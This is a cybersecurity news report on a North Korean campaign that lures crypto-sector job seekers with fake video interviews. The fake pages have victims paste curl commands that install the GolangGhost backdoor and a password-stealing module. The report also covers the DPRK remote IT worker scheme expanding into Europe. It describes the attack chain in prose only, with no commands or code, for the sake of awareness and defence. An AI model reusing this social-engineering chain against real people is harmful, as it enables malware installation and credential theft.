The N. Korean threat players behind Contagious Interview have adopted the increasingly popular ClickFix social engineering tactic to lure job seekers in the cryptocurrency sector to deliver a previously undocumented Go-based backdoor called GolangGhost on Windows & macOS systems.
The recent activity, assessed to be a continuation of the campaign, has been codenamed ClickFake Interview by French cybersecurity company Sekoia. Contagious Interview, also tracked as DeceptiveDevelopment, DEV#POPPER, & Famous Chollima, is known to be active since at least Dec. 2022, although it was only publicly documented for the 1st time in late 2023.
Job Interview
“It uses legitimate job interview websites to use the ClickFix tactic & install Windows & macOS backdoors,” Sekoia researchers Amaury G., Coline Chavane, & Felix Aimé said, attributing the effort to the infamous Lazarus Group, a prolific adversary attributed to the Reconnaissance General Bureau (RGB) of the Democratic People’s Republic of Korea (DPRK).
A major aspect of the campaign is that it primarily targets centralised finance entities by impersonating companies like Coinbase, KuCoin, Kraken, Circle, Securitize, BlockFi, Tether, Robinhood, & Bybit, marking a departure from the hacking group’s attacks against decentralised finance (DeFi) entities.
Fake Job Offers
Contagious Interview, like Operation Dream Job, employs fake job offers as lures to attract prospective targets & dupe them into downloading malware that can steal cryptocurrency & other sensitive data.
As part of the effort, candidates are approached via LinkedIn or X to prepare for a video call interview, for which they are asked to download a malware-laced videoconferencing software or open-source project that activates the infection process.
Attack Chains
Lazarus Group’s use of the ClickFix tactic was 1st disclosed towards the end of 2024 by security researcher Taylor Monahan, with the attack chains leading to the deployment of a family of malware called FERRET that then delivers the Golang backdoor.
In this version of the campaign, victims are asked to visit a purported video interviewing service named Willo & complete a video assessment of themselves.
“The entire setup, meticulously designed to build user trust, proceeds smoothly until the user is asked to enable their camera,” Sekoia explained. “At this point, an error message appears indicating that the user needs to download a driver to fix the issue. This is where the operator employs the ClickFix technique.”
Camera or Microphone
The instructions given to the victim to enable access to the camera or microphone vary depending on the operating system used. On Windows, the targets are prompted to open Command Prompt & execute a curl command to execute a Visual Basic Script (VBS) file, which then launches a batch script to run GolangGhost.
In the event the victim is visiting the site from a macOS machine, they are similarly asked to launch the Terminal app & run a curl command to run a shell script. The malicious shell script, for its part, runs a 2nd shell script that, in turn, executes a stealer module dubbed FROSTYFERRET (aka ChromeUpdateAlert) & the backdoor.
Fake Window
FROSTYFERRET displays a fake window stating the Chrome web browser needs access to the user’s camera or microphone, after which it displays a prompt to enter the system password.
The entered information, regardless of whether it is valid or otherwise, is exfiltrated to a Dropbox location, likely indicating an attempt to access the iCloud Keychain using the stolen password.
GolangGhost is engineered to facilitate remote control & data theft through several commands that allow it to upload/download files, send host information, & steal web browser data.
Manager Jobs
“It was found that all the positions were not related to technical profiles in software development,” Sekia noted. “They are mainly jobs of manager focusing on business development, asset management, product development or decentralised finance specialists.”
“This is a significant change from previous documented campaigns attributed to DPRK-nexus threat actors and based on fake job interviews, which mainly targeted developers & software engineers.”
Korea IT Worker Scheme Active in Europe#
The development comes as the Google Threat Intelligence Group (GTIG) stated it has observed a surge in the fraudulent IT worker scheme in Europe, underscoring a significant expansion of their operations beyond the US.
The IT worker activity entails N. Korean nationals posing as legitimate remote workers to infiltrate companies and generate illicit revenue for Pyongyang in violation of international sanctions.
Increased awareness of the activity, coupled with the US Justice Department indictments, have instigated a “global expansion of IT worker operations,” Google said, noting it uncovered several fabricated personas seeking employment in various organisations located in Germany & Portugal.
Falsifying their Identities
The IT workers have also been observed undertaking various projects in the United Kingdom related to web development, bot development, content management system (CMS) development, & blockchain technology, often falsifying their identities & claiming to be from Italy, Japan, Malaysia, Singapore, Ukraine, the US, & Vietnam.
This tactic of IT workers posing as Vietnamese, Japanese, & Singaporean nationals was also highlighted by managed intelligence firm Nisos early last month, while also pointing out their use of GitHub to carve new personas or recycle portfolio content from older personas to reinforce their new ones.
Various Online Platforms
“IT workers in Europe were recruited through various online platforms, including Upwork, Telegram, & Freelancer,” Jamie Collier, Lead Threat Intelligence Advisor for Europe at GTIG, said. “Payment for their services was facilitated through cryptocurrency, the TransferWise service, & Payoneer, highlighting the use of methods that obfuscate the origin & destination of funds.”
Besides using local facilitators to help them land jobs, the insider threat operation is witnessing what appears to be a spike in extortion attempts since Oct. 2024, when it became public knowledge that these IT workers are resorting to ransom payments from their employers to prevent them from releasing proprietary data or to provide it to a competitor.
Bring Your Own Device
In what appears to be a further evolution of the scheme, the IT workers are now said to be targeting companies that operate a Bring Your Own Device (BYOD) policy owing to the fact that such devices are unlikely to have traditional security & logging tools used in enterprise environments.
“Europe needs to wake up fast. Despite being in the crosshairs of IT worker operations, too many perceive this as a US problem. N. Korea’s recent shifts likely stem from US operational hurdles, showing IT workers’ agility & ability to adapt to changing circumstances,” Collier explained.
Relentless Innovation
“A decade of diverse cyberattacks precedes N. Korea’s latest surge – from SWIFT targeting & ransomware, to cryptocurrency theft & supply chain compromise.
This relentless innovation demonstrates a longstanding commitment to fund the regime through cyber operations.”
